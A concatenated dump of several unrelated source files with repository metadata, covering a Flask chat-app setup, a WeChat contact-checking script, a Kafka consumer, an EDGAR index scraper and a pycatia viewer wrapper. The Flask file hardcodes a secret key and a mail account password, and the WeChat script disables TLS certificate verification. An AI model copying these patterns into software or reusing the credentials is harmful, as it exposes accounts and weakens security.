print('Dequeued all update orders to remote DB')
"""
"""
o = ordersmodule.Order(posId)
orderId = "2c5f7858-9ef6-11e6-ab7c-9801a7a7a649"
o.fetchFromDB(orderId)
o.print()
o.deleteFromDB()
time.sleep(10)
ot = ordersmodule.OrderTable()
ot.deQueueOrdersToRemote('delete', remoteEp)
print('Dequeued all delete orders to remote DB')
numSeconds = 600
r = commonmodule.getOrdersMadeInXSeconds(posId, numSeconds)
listOfOrders = r['Items']
listOfOrdersByTime = sorted(listOfOrders, key=lambda order: order['Info']['CreatedTicks'])
print('Number of orders made in the last {} seconds: {}'.format(numSeconds, len(r['Items'])))
for oDict in listOfOrdersByTime:
oObj = ordersmodule.Order(posId)
oObj.fromDictionary(oDict)
print("New Order:")
oObj.print()
"""
|
[
"vgvcode@gmail.com"
] |
vgvcode@gmail.com
|
|
ccdeb88d110dbde58c2ab981827125e6f92f6199
|
44a9e63ceaf6d901130afb9c390288dea26b22f3
|
/application.py
|
e7bdff054a89eda437923248e9d7918a9935cf42
|
[] |
no_license
|
Dragon-yy/chat_encryption
|
69558870e11eaf3d45b430db9ebbeba651b47364
|
a8285b3e94e496df8f37b8221c2783f108292a91
|
refs/heads/master
| 2023-01-22T18:26:14.430523
| 2020-11-16T05:14:47
| 2020-11-16T05:14:47
| 313,186,820
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,572
|
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_script import Manager
from flask_login import LoginManager
from flask_mail import Mail
from flask_socketio import SocketIO
import os
class Application(Flask):
def __init__(self, import_name, template_folder, static_folder, root_path):
super(Application, self).__init__(import_name,
template_folder=template_folder,
static_folder=static_folder,
root_path=root_path)
        # Load the base configuration
self.config.from_pyfile('./config/basic_setting.py')
        # Load environment-specific overrides
if 'ops_config' in os.environ:
self.config.from_pyfile('./config/%s_setting.py' % (os.environ['ops_config']))
self.config['SECRET_KEY'] = '897109005f7b4fa01c9b00775bddecf2'
        # Mail server configuration
self.config['MAIL_SERVER'] = 'smtp.qq.com'
self.config['MAIL_PORT'] = 25
        self.config['MAIL_USE_TLS'] = True  # Flask-Mail expects MAIL_USE_TLS, not MAIL_USER_TLS
self.config['MAIL_USERNAME'] = '623852374@qq.com'
self.config['MAIL_PASSWORD'] = 'yutrhsiudilsbdgf'
db.init_app(self)
db = SQLAlchemy()
app = Application(__name__,
template_folder=os.getcwd()+'/web/templates/',
static_folder=os.getcwd()+'/web/static/',
root_path=os.getcwd())
manage = Manager(app)
# Handles login sessions on the backend
login_manager = LoginManager(app)
# Mail is used for password resets
mail = Mail(app)
socketio = SocketIO(app)
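# Illustrative entry point (an assumption, not part of the original file): with
# Flask-SocketIO the application would typically be started along these lines:
#
# if __name__ == '__main__':
#     socketio.run(app, host='0.0.0.0', port=5000)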
|
[
"62385374@qq.com"
] |
62385374@qq.com
|
eba8eeb7aafc225f599c4a18fb2b49e5aea09696
|
9e9efab69604456f51fd4421889ca882638fed7c
|
/hahaha/filehw4.py
|
4800d115c9436c4fdb55a68a85cfbc10573667c8
|
[] |
no_license
|
THACT3001/PhamTienDung-c4t3
|
9374a876d505b8f8353f879f0724837cf0eec0ee
|
9af0e19aa6e81760f22b2c4234a761a8e6c94598
|
refs/heads/master
| 2020-03-19T13:54:59.752331
| 2018-06-22T11:59:06
| 2018-06-22T11:59:06
| 136,600,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43
|
py
|
for i in range(20):
print(i, end = " ")
|
[
"tiendungpham2002@gmail.com"
] |
tiendungpham2002@gmail.com
|
de3ea653be4d4c385315ff2b3e679c3deeb39666
|
953c2daf3f5769858bd1c45f0e3776bc4b34766b
|
/parse_html/wdf.py
|
f51cda19a8b466f62bd1a9acf0ef330833b2e47e
|
[] |
no_license
|
Brian01Chen/PyLearn
|
861472f14f645e6c85d3ce747e42a13c4e95f14b
|
0f71f8a859f8ed5d37af43a4df6a704a406ae8a9
|
refs/heads/master
| 2020-03-28T07:44:23.921805
| 2018-09-16T06:32:05
| 2018-09-16T06:32:05
| 147,921,169
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,026
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
Find out which WeChat friends have deleted you
@link: https://github.com/0x5e/wechat-deleted-friends
"""
from __future__ import print_function
import os
try:
from urllib import urlencode
except ImportError:
from urllib.parse import urlencode
try:
import urllib2 as wdf_urllib
from cookielib import CookieJar
except ImportError:
import urllib.request as wdf_urllib
from http.cookiejar import CookieJar
import re
import time
import xml.dom.minidom
import json
import sys
import math
import subprocess
import ssl
DEBUG = False
MAX_GROUP_NUM = 35  # number of contacts per temporary group
INTERFACE_CALLING_INTERVAL = 16  # seconds between API calls; 13 was observed to trigger "operation too frequent"
MAX_PROGRESS_LEN = 50
QRImagePath = os.path.join(os.getcwd(), 'qrcode.jpg')
tip = 0
uuid = ''
base_uri = ''
redirect_uri = ''
skey = ''
wxsid = ''
wxuin = ''
pass_ticket = ''
deviceId = 'e000000000000000'
BaseRequest = {}
ContactList = []
My = []
SyncKey = ''
try:
xrange
range = xrange
except:
# python 3
pass
def getRequest(url, data=None):
try:
data = data.encode('utf-8')
except:
pass
finally:
return wdf_urllib.Request(url=url, data=data)
def getUUID():
global uuid
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': 'wx782c26e4c19acffb',
'fun': 'new',
'lang': 'zh_CN',
'_': int(time.time()),
}
request = getRequest(url=url, data=urlencode(params))
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
# window.QRLogin.code = 200; window.QRLogin.uuid = "oZwt_bFfRg==";
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
code = pm.group(1)
uuid = pm.group(2)
print (uuid)
if code == '200':
return True
return False
def showQRImage():
global tip
url = 'https://login.weixin.qq.com/qrcode/' + uuid
params = {
't': 'webwx',
'_': int(time.time()),
}
request = getRequest(url=url, data=urlencode(params))
response = wdf_urllib.urlopen(request)
tip = 1
f = open(QRImagePath, 'wb')
f.write(response.read())
f.close()
if sys.platform.find('darwin') >= 0:
subprocess.call(['open', QRImagePath])
elif sys.platform.find('linux') >= 0:
subprocess.call(['xdg-open', QRImagePath])
else:
os.startfile(QRImagePath)
print('请使用微信扫描二维码以登录')
def waitForLogin():
global tip, base_uri, redirect_uri
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, uuid, int(time.time()))
request = getRequest(url=url)
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
# window.code=500;
regx = r'window.code=(\d+);'
pm = re.search(regx, data)
code = pm.group(1)
    if code == '201':  # QR code scanned
print('成功扫描,请在手机上点击确认以登录')
tip = 0
    elif code == '200':  # logged in
print('正在登录...')
regx = r'window.redirect_uri="(\S+?)";'
pm = re.search(regx, data)
redirect_uri = pm.group(1) + '&fun=new'
base_uri = redirect_uri[:redirect_uri.rfind('/')]
# closeQRImage
if sys.platform.find('darwin') >= 0: # for OSX with Preview
os.system("osascript -e 'quit app \"Preview\"'")
    elif code == '408':  # timed out
pass
# elif code == '400' or code == '500':
return code
def login():
global skey, wxsid, wxuin, pass_ticket, BaseRequest
request = getRequest(url=redirect_uri)
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
'''
<error>
<ret>0</ret>
<message>OK</message>
<skey>xxx</skey>
<wxsid>xxx</wxsid>
<wxuin>xxx</wxuin>
<pass_ticket>xxx</pass_ticket>
<isgrayscale>1</isgrayscale>
</error>
'''
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
wxsid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
wxuin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
pass_ticket = node.childNodes[0].data
# print('skey: %s, wxsid: %s, wxuin: %s, pass_ticket: %s' % (skey, wxsid,
# wxuin, pass_ticket))
if not all((skey, wxsid, wxuin, pass_ticket)):
return False
BaseRequest = {
'Uin': int(wxuin),
'Sid': wxsid,
'Skey': skey,
'DeviceID': deviceId,
}
return True
def webwxinit():
url = base_uri + \
'/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
pass_ticket, skey, int(time.time()))
params = {
'BaseRequest': BaseRequest
}
request = getRequest(url=url, data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read()
if DEBUG:
f = open(os.path.join(os.getcwd(), 'webwxinit.json'), 'wb')
f.write(data)
f.close()
data = data.decode('utf-8', 'replace')
# print(data)
global ContactList, My, SyncKey
dic = json.loads(data)
ContactList = dic['ContactList']
My = dic['User']
SyncKeyList = []
for item in dic['SyncKey']['List']:
SyncKeyList.append('%s_%s' % (item['Key'], item['Val']))
SyncKey = '|'.join(SyncKeyList)
ErrMsg = dic['BaseResponse']['ErrMsg']
if DEBUG:
print("Ret: %d, ErrMsg: %s" % (dic['BaseResponse']['Ret'], ErrMsg))
Ret = dic['BaseResponse']['Ret']
if Ret != 0:
return False
return True
def webwxgetcontact():
url = base_uri + \
'/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
pass_ticket, skey, int(time.time()))
params = {
'BaseRequest': BaseRequest
}
request = getRequest(url=url,data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read()
if DEBUG:
f = open(os.path.join(os.getcwd(), 'webwxgetcontact.json'), 'wb')
f.write(data)
f.close()
#print(data)
data = data.decode('utf-8', 'replace')
dic = json.loads(data)
MemberList = dic['MemberList']
    # Iterate in reverse order, otherwise removing items breaks the traversal
SpecialUsers = ["newsapp", "fmessage", "filehelper", "weibo", "qqmail", "tmessage", "qmessage", "qqsync", "floatbottle", "lbsapp", "shakeapp", "medianote", "qqfriend", "readerapp", "blogapp", "facebookapp", "masssendapp",
"meishiapp", "feedsapp", "voip", "blogappweixin", "weixin", "brandsessionholder", "weixinreminder", "wxid_novlwrv3lqwv11", "gh_22b87fa7cb3c", "officialaccounts", "notification_messages", "wxitil", "userexperience_alarm"]
for i in range(len(MemberList) - 1, -1, -1):
Member = MemberList[i]
        if Member['VerifyFlag'] & 8 != 0:  # official/service accounts
MemberList.remove(Member)
        elif Member['UserName'] in SpecialUsers:  # special built-in accounts
MemberList.remove(Member)
        elif Member['UserName'].find('@@') != -1:  # group chats
MemberList.remove(Member)
        elif Member['UserName'] == My['UserName']:  # the logged-in user
MemberList.remove(Member)
return MemberList
def createChatroom(UserNames):
# MemberList = []
# for UserName in UserNames:
# MemberList.append({'UserName': UserName})
MemberList = [{'UserName': UserName} for UserName in UserNames]
url = base_uri + \
'/webwxcreatechatroom?pass_ticket=%s&r=%s' % (
pass_ticket, int(time.time()))
params = {
'BaseRequest': BaseRequest,
'MemberCount': len(MemberList),
'MemberList': MemberList,
'Topic': '',
}
request = getRequest(url=url, data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
dic = json.loads(data)
ChatRoomName = dic['ChatRoomName']
MemberList = dic['MemberList']
print (dic['ChatRoomName'])
print (dic['MemberList'])
DeletedList = []
for Member in MemberList:
        if Member['MemberStatus'] == 4:  # this contact has deleted you
DeletedList.append(Member['UserName'])
ErrMsg = dic['BaseResponse']['ErrMsg']
if DEBUG:
print("Ret: %d, ErrMsg: %s" % (dic['BaseResponse']['Ret'], ErrMsg))
return ChatRoomName, DeletedList
def deleteMember(ChatRoomName, UserNames):
url = base_uri + \
'/webwxupdatechatroom?fun=delmember&pass_ticket=%s' % (pass_ticket)
params = {
'BaseRequest': BaseRequest,
'ChatRoomName': ChatRoomName,
'DelMemberList': ','.join(UserNames),
}
request = getRequest(url=url, data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
dic = json.loads(data)
ErrMsg = dic['BaseResponse']['ErrMsg']
Ret = dic['BaseResponse']['Ret']
print (dic['BaseResponse'])
if DEBUG:
print("Ret: %d, ErrMsg: %s" % (Ret, ErrMsg))
if Ret != 0:
return False
return True
def addMember(ChatRoomName, UserNames):
url = base_uri + \
'/webwxupdatechatroom?fun=addmember&pass_ticket=%s' % (pass_ticket)
params = {
'BaseRequest': BaseRequest,
'ChatRoomName': ChatRoomName,
'AddMemberList': ','.join(UserNames),
}
request = getRequest(url=url, data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
dic = json.loads(data)
MemberList = dic['MemberList']
DeletedList = []
for Member in MemberList:
        if Member['MemberStatus'] == 4:  # this contact has deleted you
DeletedList.append(Member['UserName'])
ErrMsg = dic['BaseResponse']['ErrMsg']
if DEBUG:
print("Ret: %d, ErrMsg: %s" % (dic['BaseResponse']['Ret'], ErrMsg))
return DeletedList
def syncCheck():
url = base_uri + '/synccheck?'
params = {
        'skey': BaseRequest['Skey'],  # the dict key defined above is 'Skey', not 'SKey'
'sid': BaseRequest['Sid'],
'uin': BaseRequest['Uin'],
'deviceId': BaseRequest['DeviceID'],
'synckey': SyncKey,
'r': int(time.time()),
}
request = getRequest(url=url + urlencode(params))
response = wdf_urllib.urlopen(request)
    data = response.read().decode('utf-8', 'replace')
    # print(data)
    # The response looks like: window.synccheck={retcode:"0",selector:"2"}
    pm = re.search(r'retcode:"(\d+)",selector:"(\d+)"', data)
    return pm.groups() if pm else (None, None)
def main():
try:
ssl._create_default_https_context = ssl._create_unverified_context
opener = wdf_urllib.build_opener(
wdf_urllib.HTTPCookieProcessor(CookieJar()))
wdf_urllib.install_opener(opener)
except:
pass
if not getUUID():
print('获取uuid失败')
return
showQRImage()
time.sleep(1)
while waitForLogin() != '200':
pass
os.remove(QRImagePath)
if not login():
print('登录失败')
return
if not webwxinit():
print('初始化失败')
return
MemberList = webwxgetcontact()
MemberCount = len(MemberList)
print('通讯录共%s位好友' % MemberCount)
ChatRoomName = ''
result = []
d = {}
for Member in MemberList:
d[Member['UserName']] = (Member['NickName'].encode(
'utf-8'), Member['RemarkName'].encode('utf-8'))
print('开始查找...')
group_num = int(math.ceil(MemberCount / float(MAX_GROUP_NUM)))
for i in range(0, group_num):
UserNames = []
for j in range(0, MAX_GROUP_NUM):
if i * MAX_GROUP_NUM + j >= MemberCount:
break
Member = MemberList[i * MAX_GROUP_NUM + j]
UserNames.append(Member['UserName'])
        # Create the temporary group, or add members to the existing one
if ChatRoomName == '':
(ChatRoomName, DeletedList) = createChatroom(UserNames)
else:
DeletedList = addMember(ChatRoomName, UserNames)
DeletedCount = len(DeletedList)
if DeletedCount > 0:
result += DeletedList
        # Remove the members from the group again
deleteMember(ChatRoomName, UserNames)
        # Progress bar
progress_len = MAX_PROGRESS_LEN
progress = '-' * progress_len
progress_str = '%s' % ''.join(
map(lambda x: '#', progress[:math.ceil((progress_len * (i + 1)) / group_num)]))
print(''.join(
['[', progress_str, ''.join('-' * (progress_len - len(progress_str))), ']']))
print('新发现你被%d人删除' % DeletedCount)
for i in range(DeletedCount):
if d[DeletedList[i]][1] != '':
print(d[DeletedList[i]][0] + '(%s)' % d[DeletedList[i]][1])
else:
print(d[DeletedList[i]][0])
if i != group_num - 1:
print('正在继续查找,请耐心等待...')
            # Wait before the next API call
time.sleep(INTERFACE_CALLING_INTERVAL)
    # TODO: delete the temporary group
print('\n结果汇总完毕,20s后可重试...')
resultNames = []
for r in result:
if d[r][1] != '':
resultNames.append(d[r][0] + '(%s)' % d[r][1])
else:
resultNames.append(d[r][0])
print('---------- 被删除的好友列表(共%d人) ----------' % len(result))
    # Strip emoji span markup
    # Materialise the map, otherwise the iterator is exhausted by len(list(...)) under Python 3
    resultNames = list(map(lambda x: re.sub(r'<span.+/span>', '', x), resultNames))
    if len(resultNames):
print('\n'.join(resultNames))
else:
print("无")
print('---------------------------------------------')
# Fix console encoding issues on Windows
# http://blog.csdn.net/heyuxuanzee/article/details/8442718
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
print('本程序的查询结果可能会引起一些心理上的不适,请小心使用...')
print('开始')
main()
print('结束')
|
[
"csongbj@cn.ibm.com"
] |
csongbj@cn.ibm.com
|
14a03bf9657d107f33251129650769f78af3c36f
|
9323e9e46852fd32bf9b7c427fbaf00062d05a29
|
/consumer.py
|
c5ec343f93797745e626b7d6a0aa1d39f78c013b
|
[] |
no_license
|
vikramfa/CRISP-functionality
|
2c0c0a3ed9a1f9512fe8d39795f40bd8fe53bc63
|
789f5a04a8f40ca80bba436ea557a17cedbbe1ae
|
refs/heads/master
| 2022-12-18T16:04:28.512986
| 2018-08-26T06:40:02
| 2018-08-26T06:40:02
| 146,157,011
| 0
| 0
| null | 2022-12-08T02:23:01
| 2018-08-26T06:26:06
|
Python
|
UTF-8
|
Python
| false
| false
| 4,407
|
py
|
#!/usr/bin/env python
import os
import django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "batchapi.settings")
django.setup()
from django.conf import settings
# from confluent_kafka import Consumer, KafkaError
from kafka import KafkaConsumer
import json
from rest_services.api.service.webhooksProcessService import WebhookProcessService
def process_streamsets(topic, r_body):
"""
    Create a partial file with the StreamSets output for one topic.
    If the StreamSets output is complete, generate the result file from the combined data.
:return:
"""
# Extract batch id
# expecting below json format from topic 'batch'
#{"batch_id":1, "Batch Name":"crisp", "File Upload Time":"06-11-2018", "Number of Failed Records":0, "Number of Record Processed":1, "Number of Records with no data available":"N/A", "Record Processing Time":"1 minute", "Uploader Name":"rajsekar"}
try:
data = json.loads(r_body)
except (ValueError, KeyError, TypeError):
print ("Request body is not in JSON format")
return
if topic in ('shodan', 'censys', 'domainiq') and len(data) == 0:
return
batch_id = data[0]['batch_id']
# Generate partial file
file_name = '%s/result_files/batch_%s_%s.json' % (settings.MEDIA_ROOT, batch_id, topic)
result_file_name = '%s/result_files/batch_%s.xlsx' % (settings.MEDIA_ROOT, batch_id)
with open(file_name, 'w') as jsonfile:
json.dump(data, jsonfile)
jsonfile.close()
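    # Example (illustrative): for batch_id=24 and topic='shodan' the partial file is
    # <MEDIA_ROOT>/result_files/batch_24_shodan.json, and the combined result would be
    # <MEDIA_ROOT>/result_files/batch_24.xlsx (see result_file_name above).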
#batch_completed_post_hook()
#def batch_completed_post_hook():
# send push notification, send email notification
def process_streamsets_audit_details(topic, r_body):
"""
    Process the audit details from the Kafka topic 'status' as StreamSets output,
    update them in the Batch table, and generate the final batch result file from the combined data.
:return:
"""
# Extract batch id
# expecting below json format from topic 'status' for audit details of pipeline
#{ "Batch ID": 24, "Record Count": 3, "Status": "Completed","batch_api": "domainiq" }
try:
data = json.loads(r_body)
except (ValueError, KeyError, TypeError):
print("Request body is not in JSON format")
return
    if topic == 'status' and len(data) == 0:  # ('status') is a plain string, not a tuple
return
webhookService = WebhookProcessService()
webhookService.persistWebhooksStatusInfo(data)
if __name__ == '__main__':
# Use the KafkaConsumer class to consume latest messages and auto-commit offsets
# `consumer_timeout_ms` param is used in order to stop iterating KafkaConsumer
# if no message can be found after 1sec
# consumer = Consumer({
# 'bootstrap.servers': settings.KAFKA_SERVER,
# 'group.id': 'batch',
# 'default.topic.config': {
# 'auto.offset.reset': 'smallest'
# }
# })
# consumer.subscribe(['batch', 'shodan', 'censys', 'domainiq'])
# while True:
# message = consumer.poll(1.0)
# if message is None:
# continue
# if message.error():
# if message.error().code() == KafkaError._PARTITION_EOF:
# continue
# else:
# print(message.error())
# break
# print('Received message: {}'.format(message.value().decode('utf-8')))
# topic = message.topic()
# request_body = message.value().decode('utf-8')
# print ("%s:%d:%d: value=%s" % (
# message.topic(), message.partition(),
# message.offset(), message.value().decode('utf-8'))
# )
# process_streamsets(topic, request_body)
# consumer.close()
consumer = KafkaConsumer(
'shodan', 'censys', 'domainiq', 'status',
bootstrap_servers=settings.KAFKA_SERVER,
consumer_timeout_ms=1000
)
while True:
for message in consumer:
if message is not None:
topic = message.topic
request_body = message.value.decode('utf-8')
print ("%s:%d:%d: value=%s" % (
message.topic, message.partition,
message.offset, request_body)
)
if topic in ('shodan', 'censys', 'domainiq'):
process_streamsets(topic, request_body)
elif topic == 'status':
process_streamsets_audit_details(topic, request_body)
consumer.close()
|
[
"Am4mindia6"
] |
Am4mindia6
|
e0a07f0877c22270af528518660a94bb564ce5e8
|
e95d38b9ff5198553b263aed6c401ce3f5ad1548
|
/dep/xbrl_pipeline/scripts/scrape/scrape-edgar-index.py
|
2c30afdf9c25562d95ecaf75093c65fa9500cc20
|
[] |
no_license
|
emmettFC/selected-projects
|
2fffca1d8bf383784d208c3943a4e9751f4a3108
|
f13039c5f390f43857f5ea58751f5f0ad012ec56
|
refs/heads/master
| 2021-06-01T15:24:54.382956
| 2020-10-16T17:09:20
| 2020-10-16T17:09:20
| 112,818,838
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,780
|
py
|
import json
import urllib2
import argparse
from datetime import datetime, date, timedelta
from elasticsearch import Elasticsearch
from elasticsearch.helpers import streaming_bulk
# --
# CLI
parser = argparse.ArgumentParser(description='Scrape EDGAR indices')
parser.add_argument('--from-scratch', dest='from_scratch', action="store_true")
parser.add_argument('--min-year', type=int, dest='min_year', action="store", default=2011)
parser.add_argument('--max-year', type=int, dest='max_year', action="store", default=int(date.today().year))
parser.add_argument('--most-recent', dest='most_recent', action="store_true")
parser.add_argument('--config-path', type=str, action='store', default='../config.json')
args = parser.parse_args()
config = json.load(open(args.config_path))
client = Elasticsearch([
{"host" : config['es']['host'],
"port" : config['es']['port']}
], timeout=6000)
# --
# Functions
def get_max_date():
global config
query = {
"size" : 0,
"aggs" : { "max" : { "max" : { "field" : "date" } } }
}
d = client.search(index = config['edgar_index']['index'], body = query)
return int(d['aggregations']['max']['value'])
def download_index(yr, q, from_date=None):
    global config
    # Resolve the Elasticsearch max date lazily; a call in the default argument
    # would run once at definition time instead of per call.
    if from_date is None:
        from_date = get_max_date()
    parsing = False
index_url = 'ftp://ftp.sec.gov/edgar/full-index/%d/QTR%d/master.idx' % (yr, q)
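    # Each data row of master.idx is pipe-delimited as
    # CIK|Company Name|Form Type|Date Filed|Filename, e.g. (illustrative values):
    # 320193|APPLE INC|10-K|2015-10-28|edgar/data/320193/0000320193-15-000008.txt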
for line in urllib2.urlopen(index_url):
if parsing:
cik, name, form, date, url = line.strip().split('|')
date_int = 1000 * int(datetime.strptime(date, '%Y-%m-%d').strftime("%s"))
if date_int > from_date:
yield {
"_id" : url,
"_type" : config['edgar_index']['_type'],
"_index" : config['edgar_index']['index'],
"_source" : {
"cik" : cik,
"name" : (name.replace("\\", '')).decode('unicode_escape'),
"form" : form,
"date" : date,
"url" : url
}
}
else:
pass
elif line[0] == '-':
parsing = True
# --
# Run
if args.most_recent:
yr = date.today().year
q = ((date.today().month - 1) / 3) + 1
for a, b in streaming_bulk(client, download_index(yr, q), chunk_size = 1000):
print a, b
elif args.from_scratch:
yrs = range(args.min_year, args.max_year)
qtrs = [1, 2, 3, 4]
for yr in yrs:
for qtr in qtrs:
            for a, b in streaming_bulk(client, download_index(yr, qtr, from_date = -1), chunk_size = 1000):
print a, b
else:
raise Exception('Specificy either `most_recent` or `from_scratch`')
|
[
"emmettfculhane@gmail.com"
] |
emmettfculhane@gmail.com
|
f3b0df71b486b4606440e429447032bdef225f1a
|
499f5402baed77d000c65f243b457c69dc3d2fe4
|
/pycatia/in_interfaces/viewer.py
|
befb678950f3db7090270c8eac7757b337f7c8d4
|
[
"MIT"
] |
permissive
|
evereux/pycatia
|
416189b34f3c60effea8a76258e36ffc5ae86e22
|
5f5726d5dc66265b3eba8a01910c4aeae424365d
|
refs/heads/master
| 2023-08-21T10:03:41.660445
| 2023-08-09T16:21:10
| 2023-08-09T16:21:10
| 159,069,580
| 141
| 42
|
MIT
| 2023-08-09T11:15:27
| 2018-11-25T20:04:31
|
Python
|
UTF-8
|
Python
| false
| false
| 12,683
|
py
|
#!/usr/bin/python3.9
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from typing import TYPE_CHECKING
from pycatia.in_interfaces.camera import Camera
from pycatia.system_interfaces.any_object import AnyObject
if TYPE_CHECKING:
from pycatia.in_interfaces.viewer_2d import Viewer2D
from pycatia.in_interfaces.viewer_3d import Viewer3D
class Viewer(AnyObject):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| Viewer
|
| Represents the viewer.
| The viewer is the object that makes your objects display on the
| screen.
"""
def __init__(self, com_object):
super().__init__(com_object)
self.viewer = com_object
@property
def full_screen(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property FullScreen() As boolean
|
| Returns or sets the state of a viewer to occupy the whole
| screen.
| True if the viewer occupies the whole screen.
|
| Example:
| This example retrieves in IsFullScreen whether the MyViewer viewer
| occupies the whole screen.
|
| IsFullScreen = MyViewer.FullScreen
:return: bool
:rtype: bool
"""
return self.viewer.FullScreen
@full_screen.setter
def full_screen(self, value: bool):
"""
:param bool value:
"""
self.viewer.FullScreen = value
@property
def height(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property Height() As long (Read Only)
|
| Returns the viewer's height, in pixels.
|
| Example:
| This example retrieves the height of the MyViewer
| viewer.
|
| h = MyViewer.Height
:return: int
:rtype: int
"""
return self.viewer.Height
@property
def width(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property Width() As long (Read Only)
|
| Returns the viewer's width, in pixels.
|
| Example:
| This example retrieves the width of the MyViewer
| viewer.
|
| w = MyViewer.Width
:return: int
:rtype: int
"""
return self.viewer.Width
def activate(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub Activate()
|
| Activates the viewer in the window.
|
| Example:
| This example activates Viewers(1) in the window
| MyWindow.
|
| MyWindow.Viewers(1).Activate()
:return: None
:rtype: None
"""
return self.viewer.Activate()
def capture_to_file(self, i_format: int, i_file: str) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub CaptureToFile(CatCaptureFormat iFormat,
| CATBSTR iFile)
|
| Captures the actually displayed scene by the viewer as an image, and stores
| the image in a file. Clipped parts of the scene are also clipped in the
| captured image. Images can be captured as CGM, EMF, TIFF, TIFF Greyscale, BMP,
| and JPEG images.
|
| Parameters:
|
| iFormat
| The format in which the image will be created
| iFile
| The full pathname of the file into which you want to store the
| captured image
| Example:
| This example captures the displayed part of the MyViewer viewer as
| a BMP image, and stores it in the e:\\MyImage.bmp
| file.
|
| MyViewer.CaptureToFile catCaptureFormatBMP, "e:\\MyImage.bmp"
:param int i_format:
:param str i_file:
:return: None
:rtype: None
"""
return self.viewer.CaptureToFile(i_format, i_file)
def get_background_color(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub GetBackgroundColor(CATSafeArrayVariant color)
|
| Gets the viewer's background color. The color is expressed in the RGB color
| mode, as a triplet of coordinates ranging from 0 to 1 for the red, green, and
| blue colors respectively.
|
| Example:
| This example gets the background color of the MyViewer
| viewer.
|
| Dim color(2)
| MyViewer.GetBackgroundColor color
        :return: tuple
        :rtype: tuple
"""
vba_function_name = 'get_background_color'
vba_code = """
Public Function get_background_color(viewer)
Dim color (2)
viewer.GetBackgroundColor color
get_background_color = color
End Function
"""
system_service = self.application.system_service
return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def create_viewer_2d(self) -> 'Viewer2D':
from pycatia.in_interfaces.viewer_2d import Viewer2D
return Viewer2D(self.viewer)
def create_viewer_3d(self) -> 'Viewer3D':
from pycatia.in_interfaces.viewer_3d import Viewer3D
return Viewer3D(self.viewer)
def new_camera(self) -> Camera:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func NewCamera() As Camera
|
| Creates a new camera from the viewpoint of the viewer.
|
| Example:
| This example creates the MyCamera new camera by using the current
| viewpoint of the MyViewer viewer.
|
| Dim MyCamera As Camera
| Set MyCamera = MyViewer.NewCamera()
:return: Camera
:rtype: Camera
"""
return Camera(self.viewer.NewCamera())
def put_background_color(self, color: tuple) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub PutBackgroundColor(CATSafeArrayVariant color)
|
| Sets the viewer's background color. The color is expressed in the RGB color
| mode, as a triplet of coordinates ranging from 0 to 1 for the red, green, and
| blue colors respectively.
|
| Example:
| This example sets the background color of the MyViewer viewer to blue,
| that is the color with (0.,0.,1.) coordinates
|
| MyViewer.PutBackgroundColor Array(0, 0, 1)
